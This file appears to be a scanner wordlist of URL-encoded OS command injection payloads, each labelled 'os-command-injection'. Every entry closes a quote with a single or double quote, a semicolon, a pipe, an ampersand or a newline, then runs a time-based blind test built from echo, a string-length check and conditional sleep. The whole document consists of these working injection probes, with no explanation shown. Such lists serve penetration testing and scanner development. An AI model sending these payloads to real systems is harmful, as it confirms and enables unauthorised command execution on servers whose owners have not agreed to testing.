+os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%3B%20str%3D%24%28echo%20VJZVXS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%22%7C%20%5B%201%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%202%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%203%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%204%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%205%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%206%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%207%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%208%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%7C%20%5B%209%20-ne%20%24%28echo%20GBBAUV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ATDESO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%22%0A%20str%3D%24%28echo%20LZSVGK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' 